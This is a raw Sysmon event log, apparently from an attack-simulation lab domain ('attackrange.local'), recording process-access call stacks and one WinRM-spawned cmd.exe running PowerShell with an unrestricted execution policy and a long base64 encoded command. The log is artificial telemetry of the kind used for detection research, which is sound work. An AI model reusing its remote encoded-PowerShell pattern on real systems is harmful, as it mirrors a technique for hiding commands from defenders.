13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.746{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8E18-6005-BA02-00000000A201}43523740C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.754{59A5CD1D-8E18-6005-BC02-00000000A201}4696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcA
QgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.746{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.746{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.746{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.653{59A5CD1D-8CA9-6005-1300-00000000A201}12681856C:\Windows\system32\svchost.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.637{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.621{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E18-6005-BA02-00000000A201}4352C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E18-6005-BB02-00000000A201}4220C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:12.574{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 